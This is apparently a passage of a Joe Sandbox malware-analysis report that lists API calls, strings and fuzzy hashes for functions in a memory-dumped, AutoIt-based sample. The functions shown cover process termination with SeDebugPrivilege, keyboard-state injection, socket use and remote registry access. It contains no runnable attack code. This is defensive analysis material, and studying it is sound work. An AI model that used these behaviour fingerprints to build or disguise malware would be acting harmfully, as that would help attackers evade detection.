                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat
                                        • String ID: SysListView32
                                        • API String ID: 307300125-78025650
                                        • Opcode ID: d4df415842734df956e46c6a791d559091f98a39f8676a352a90ee4de2972c11
                                        • Instruction ID: 2b1dbf4e0fd5bb4b740dd41fc01d3d4cf72ac22734f72952ed49fe7310c69774
                                        • Opcode Fuzzy Hash: d4df415842734df956e46c6a791d559091f98a39f8676a352a90ee4de2972c11
                                        • Instruction Fuzzy Hash: 7D41C471900308EFDF219FA4C889BEE77B8EF48754F10442AF645E7291D2799D84CB64
                                        APIs
                                          • Part of subcall function 007B6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007B6F7D
                                          • Part of subcall function 007B6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007B6F8D
                                          • Part of subcall function 007B6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007B7022
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D168B
                                        • GetLastError.KERNEL32 ref: 007D169E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D16CA
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D1746
                                        • GetLastError.KERNEL32(00000000), ref: 007D1751
                                        • CloseHandle.KERNEL32(00000000), ref: 007D1786
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 2ea98562ca92b6cd96d9339f6ddab2a29212951ce5dcd369faa1111ffde2f65c
                                        • Instruction ID: 14833adccdfc816f6e98b8ea2c295888cef2d8bb867a08d59ae3697547772275
                                        • Opcode Fuzzy Hash: 2ea98562ca92b6cd96d9339f6ddab2a29212951ce5dcd369faa1111ffde2f65c
                                        • Instruction Fuzzy Hash: FA419A71640201EFDB15EF64C8A9FADB7A5AF44315F198049F9069F3A2EB7C9D00CB51
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 007B62D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 303c44b26868a5cc6d666bcf43ad9251e26374581e5477c7da3a0157ea0df1fe
                                        • Instruction ID: 643faf53fdd59b3611092bcd780fec6c49173de1f1a3d1b18475a69860cb1704
                                        • Opcode Fuzzy Hash: 303c44b26868a5cc6d666bcf43ad9251e26374581e5477c7da3a0157ea0df1fe
                                        • Instruction Fuzzy Hash: 0811D076608353BAF7055B54AC56FFA739CFF25724B100029F701A6281FBAC69409564
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 007B7595
                                        • LoadStringW.USER32(00000000), ref: 007B759C
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B75B2
                                        • LoadStringW.USER32(00000000), ref: 007B75B9
                                        • _wprintf.LIBCMT ref: 007B75DF
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B75FD
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 007B75DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 2415146f724def6313f3dac5d75e009f12bf3a15eb90765027d3fdde4cefbc5f
                                        • Instruction ID: ffb1d5c4495746ec2bde2a22b1ca745363a7aca01f6c3d685ea59161391d6a9d
                                        • Opcode Fuzzy Hash: 2415146f724def6313f3dac5d75e009f12bf3a15eb90765027d3fdde4cefbc5f
                                        • Instruction Fuzzy Hash: 790112F2500208BFE721A7D4AD89EF6776CDB08305F004495B745D6141EA789E84CB79
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2AE7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3479070676-0
                                        • Opcode ID: bec8c469f94f8fa3b976341a1136f26a91596a6200788639a766d6c8b695c98d
                                        • Instruction ID: e1fce24a3715fd91962d5e896a688d203b429e36d51f4e181b99c57eee1fef95
                                        • Opcode Fuzzy Hash: bec8c469f94f8fa3b976341a1136f26a91596a6200788639a766d6c8b695c98d
                                        • Instruction Fuzzy Hash: FA915871204201EFCB11EF14C895B6EB7F5AF98310F14844EF59A972A2EB78ED46CB52
                                        APIs
                                        • select.WS2_32 ref: 007C9B38
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9B45
                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 007C9B6F
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9B9F
                                        • htons.WS2_32(?), ref: 007C9C51
                                        • inet_ntoa.WS2_32(?), ref: 007C9C0C
                                          • Part of subcall function 007AE0F5: _strlen.LIBCMT ref: 007AE0FF
                                          • Part of subcall function 007AE0F5: _memmove.LIBCMT ref: 007AE121
                                        • _strlen.LIBCMT ref: 007C9CA7
                                        • _memmove.LIBCMT ref: 007C9D10
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 3637404534-0
                                        • Opcode ID: 4f1d5289fa28ea09a9bf0d18507f2a5fb196bebacb61c196aebc544f581f892f
                                        • Instruction ID: 1dcfc65bb28e7d610441e8920b3a95ca75eb53f9bdca5063d8e2f4902a2897f7
                                        • Opcode Fuzzy Hash: 4f1d5289fa28ea09a9bf0d18507f2a5fb196bebacb61c196aebc544f581f892f
                                        • Instruction Fuzzy Hash: 4C81A071504240EBCB20EF64CC49F6BB7E8EB89714F10861DF6599B291DB78DD04CBA2
                                        APIs
                                        • __mtinitlocknum.LIBCMT ref: 0079B744
                                          • Part of subcall function 00798A0C: __FF_MSGBANNER.LIBCMT ref: 00798A21
                                          • Part of subcall function 00798A0C: __NMSG_WRITE.LIBCMT ref: 00798A28
                                          • Part of subcall function 00798A0C: __malloc_crt.LIBCMT ref: 00798A48
                                        • __lock.LIBCMT ref: 0079B757
                                        • __lock.LIBCMT ref: 0079B7A3
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00826948,00000018,007A6C2B,?,00000000,00000109), ref: 0079B7BF
                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0079B7DC
                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0079B7EC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1422805418-0
                                        • Opcode ID: ab45c6ec3e027602f4fc53a80ee3a40d8ef1c440c2914a627e94a1dd95a57206
                                        • Instruction ID: 03c95764d5553da53f5d7fbd05fb2c60685589f09e474f59669075e27967661b
                                        • Opcode Fuzzy Hash: ab45c6ec3e027602f4fc53a80ee3a40d8ef1c440c2914a627e94a1dd95a57206
                                        • Instruction Fuzzy Hash: D3410271910215CBEF10DFA8FA897A8BBA4BF45335F108319E825AB2D1D77CA841CBD5
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 007BA1CE
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007BA205
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007BA221
                                        • _memmove.LIBCMT ref: 007BA26F
                                        • _memmove.LIBCMT ref: 007BA28C
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007BA29B
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007BA2B0
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007BA2CF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 256516436-0
                                        • Opcode ID: e306234f63dc61ccd7c1419be988a854f4d9496a34cf49ffdd4115202257ad6c
                                        • Instruction ID: 08f5bb221286ae3ac227511a02f78eeae51473779a8de24202e087457142738b
                                        • Opcode Fuzzy Hash: e306234f63dc61ccd7c1419be988a854f4d9496a34cf49ffdd4115202257ad6c
                                        • Instruction Fuzzy Hash: 6F319231900105EFCF10EF95DC89AAEB7B9FF85310B1480A5F904AB256D778DD15CBA5
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 007D8CF3
                                        • GetDC.USER32(00000000), ref: 007D8CFB
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D8D06
                                        • ReleaseDC.USER32(00000000,00000000), ref: 007D8D12
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 007D8D4E
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D8D5F
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007DBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 007D8D99
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D8DB9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 1c3fc6a2d1557faad76cfe3f5dd79f8cc52d148e4aac3bbc69e4fc08256af57f
                                        • Instruction ID: bbcf97b600ffc4e130c475eb6b79dfc305bbbe1901ec6821685b2abae0a428d3
                                        • Opcode Fuzzy Hash: 1c3fc6a2d1557faad76cfe3f5dd79f8cc52d148e4aac3bbc69e4fc08256af57f
                                        • Instruction Fuzzy Hash: BB315A72201214BBEB208F508C8AFEA3BAAEF49755F048055FE08DA291DA799C41CB74
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dc771a00f4e94e2608bed825416467a63151a12322f6097c571991b7ef675b4
                                        • Instruction ID: 8ac53090637913f19fe92f4e01e98c55ef3257ffb163e5a5ec0c44c4e1fcb6c7
                                        • Opcode Fuzzy Hash: 5dc771a00f4e94e2608bed825416467a63151a12322f6097c571991b7ef675b4
                                        • Instruction Fuzzy Hash: 7B716C71900149EFCB14DF98CC89EBEBF79FF89314F248159F915AA251C7389A12CB64
                                        APIs
                                        • _memset.LIBCMT ref: 007D214B
                                        • _memset.LIBCMT ref: 007D2214
                                        • ShellExecuteExW.SHELL32(?), ref: 007D2259
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 00773BCF: _wcscpy.LIBCMT ref: 00773BF2
                                        • CloseHandle.KERNEL32(00000000), ref: 007D2320
                                        • FreeLibrary.KERNEL32(00000000), ref: 007D232F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                        • String ID: @
                                        • API String ID: 4082843840-2766056989
                                        APIs
                                        • GetParent.USER32(?), ref: 007B481D
                                        • GetKeyboardState.USER32(?), ref: 007B4832
                                        • SetKeyboardState.USER32(?), ref: 007B4893
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B48C1
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B48E0
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B4926
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B4949
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        APIs
                                        • GetParent.USER32(00000000), ref: 007B4638
                                        • GetKeyboardState.USER32(?), ref: 007B464D
                                        • SetKeyboardState.USER32(?), ref: 007B46AE
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B46DA
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B46F7
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B473B
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B475C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: _wcsncpy$LocalTime
                                        • String ID:
                                        • API String ID: 2945705084-0
                                        APIs
                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007D8DF4
                                        • GetWindowLongW.USER32(01769018,000000F0), ref: 007D8E27
                                        • GetWindowLongW.USER32(01769018,000000F0), ref: 007D8E5C
                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007D8E8E
                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007D8EB8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007D8EC9
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D8EE3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B1734
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B175A
                                        • SysAllocString.OLEAUT32(00000000), ref: 007B175D
                                        • SysAllocString.OLEAUT32(?), ref: 007B177B
                                        • SysFreeString.OLEAUT32(?), ref: 007B1784
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007B17A9
                                        • SysAllocString.OLEAUT32(?), ref: 007B17B7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        APIs
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                        • lstrcmpiW.KERNEL32(?,?), ref: 007B6A2B
                                        • _wcscmp.LIBCMT ref: 007B6A49
                                        • MoveFileW.KERNEL32(?,?), ref: 007B6A62
                                          • Part of subcall function 007B6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007B6DBA
                                          • Part of subcall function 007B6D6D: GetLastError.KERNEL32 ref: 007B6DC5
                                          • Part of subcall function 007B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007B6DD9
                                        • _wcscat.LIBCMT ref: 007B6AA4
                                        • SHFileOperationW.SHELL32(?), ref: 007B6B0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2323102230-1173974218
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B180D
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B1833
                                        • SysAllocString.OLEAUT32(00000000), ref: 007B1836
                                        • SysAllocString.OLEAUT32 ref: 007B1857
                                        • SysFreeString.OLEAUT32 ref: 007B1860
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007B187A
                                        • SysAllocString.OLEAUT32(?), ref: 007B1888
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        APIs
                                          • Part of subcall function 0078C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                          • Part of subcall function 0078C619: GetStockObject.GDI32(00000011), ref: 0078C66B
                                          • Part of subcall function 0078C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007DA13B
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007DA148
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007DA153
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007DA162
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007DA16E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 00794C3E
                                          • Part of subcall function 007986B5: GetLastError.KERNEL32(?,00790127,007988A3,00794673,?,?,00790127,?,0077125D,00000058,?,?), ref: 007986B7
                                          • Part of subcall function 007986B5: __calloc_crt.LIBCMT ref: 007986D8
                                          • Part of subcall function 007986B5: GetCurrentThreadId.KERNEL32 ref: 00798701
                                          • Part of subcall function 007986B5: SetLastError.KERNEL32(00000000,00790127,007988A3,00794673,?,?,00790127,?,0077125D,00000058,?,?), ref: 00798719
                                        • CloseHandle.KERNEL32(?,?,00794C1D), ref: 00794C52
                                        • __freeptd.LIBCMT ref: 00794C59
                                        • RtlExitUserThread.NTDLL(00000000,?,00794C1D), ref: 00794C61
                                        • GetLastError.KERNEL32(?,?,00794C1D), ref: 00794C91
                                        • RtlExitUserThread.NTDLL(00000000,?,?,00794C1D), ref: 00794C98
                                        • __freefls@4.LIBCMT ref: 00794CB4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Similarity
                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1445074172-0
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0078C6C0
                                        • GetWindowRect.USER32(?,?), ref: 0078C701
                                        • ScreenToClient.USER32(?,?), ref: 0078C729
                                        • GetClientRect.USER32(?,?), ref: 0078C856
                                        • GetWindowRect.USER32(?,?), ref: 0078C86F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: fa555111e7037f6389c82eea37afd50463ed968b4905f28931ec0a5e49ee46d9
